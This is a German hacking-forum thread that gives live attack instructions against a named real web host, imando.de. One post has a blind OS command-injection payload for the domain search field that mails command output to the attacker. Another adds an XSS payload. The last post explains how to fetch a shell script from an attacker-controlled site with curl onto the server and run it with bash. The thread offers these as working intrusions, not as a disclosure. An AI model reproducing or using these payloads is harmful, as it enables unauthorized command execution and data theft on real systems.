Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

imando.de - Blind OS Command Injection

- - - - -
Erstellt von Zero-X ,

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
Zero-X
Geschrieben 01 October 2014 - 18:49 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

Please Login HERE or Register HERE to see this link!



Im Feld "Domainsuche" folgendes eingeben:

;ls|mail deine@mail
Wichtig ist, dass bei der E-Mail Adresse keine Domainendung angegeben wird sonst funktioniert es nicht.
Die Domainendung wählt man im unteren Feld aus, je nachdem wo die passende Domainendung der E-Mail Adresse dabei ist.
Der Server hängt manchmal etwas und es kann dann bis 5 Minuten dauern, bis die E-Mail mit der Befehlsausgabe ankommt.

#2
ProHex
Geschrieben 01 October 2014 - 20:26 Uhr

ProHex

    Hacker

  • Moderator
    • Likes
    212
  • 219 Beiträge
  • 185 Bedankt
XSS haben die auch:

Please Login HERE or Register HERE to see this link!



Jedes Feld in dem Format:

INPUT" <xss>

also zb:

bla" onmouseover=alert(1337)

btw ich bekomm als output bei deiner lücke immer:

No whois server is known for this kind of object.

Bearbeitet von ProHex, 01 October 2014 - 20:27 Uhr.

#3
Zero-X
Geschrieben 02 October 2014 - 14:14 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Was hast du im Feld "Domainsuche" eingegeben?
Wenn du etwas mit Punkten eingibst, ignoriert der Server die Anfrage.
Angenommen du gibst "ls *.php" ein, versucht das Skript mit dem Whois-Server von php-Domains Kontakt aufzunehmen und da es diesen Server nicht gibt kommt eine Fehlermeldung.

#4
ProHex
Geschrieben 02 October 2014 - 20:10 Uhr

ProHex

    Hacker

  • Moderator
    • Likes
    212
  • 219 Beiträge
  • 185 Bedankt

Was hast du im Feld "Domainsuche" eingegeben?
Wenn du etwas mit Punkten eingibst, ignoriert der Server die Anfrage.
Angenommen du gibst "ls *.php" ein, versucht das Skript mit dem Whois-Server von php-Domains Kontakt aufzunehmen und da es diesen Server nicht gibt kommt eine Fehlermeldung.


das erklärt alles :/ danke dir!

#5
Zero-X
Geschrieben 03 October 2014 - 12:04 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Noch ein kleiner Tip von mir.

Um das Problem mit den Punkten zu umgehen, kannst du ein Shell-Skript erstellen, das die von dir gewünschten Aktionen ausführt.

Du nimmst einen FTP-Account von einer Domain, am besten eine auf der noch niemand etwas hochgeladen hat und lädst das Shell-Skript als index.html in das Webverzeichnis.
Dann kannst du mit Hilfe von wget oder curl die Datei auf den Server laden.
Dafür gibst du zum Beispiel das hier ein:

curl -o deinscript deineseite (ohne Domainendung)

Unten im Feld mit den Domainendungen wählst du dann das entsprechende aus.
Die Datei wird auf den Server geladen.

Das Skript führst du dann so aus:

bash deinscript

So habe ich es gemacht. Es gibt vielleicht noch bessere Lösungen als diese hier aber das fand ich am einfachsten.
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 42 user(s)


    , .:dodo:., armani6969, Bus1ness Junkie, Ch!ller, clown1337, Cranko, Cube, curlz, CyberFlash, cyberrainalpha, FalkE, FatalityMods, fluffybunny, Framerater, G0rki, ghost12, gutzuu, kpakpando, Laggy, laxs, most_uniQue, notfound, paulaner, pdr0, poppel, pornoralle, ProHex, Roto, S3lent, smc2014, Smokyjoe, speedfreak, Streetboz, Tortschi, Twix2010, Unkiii, vôl, werwardas, will, Xenio, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking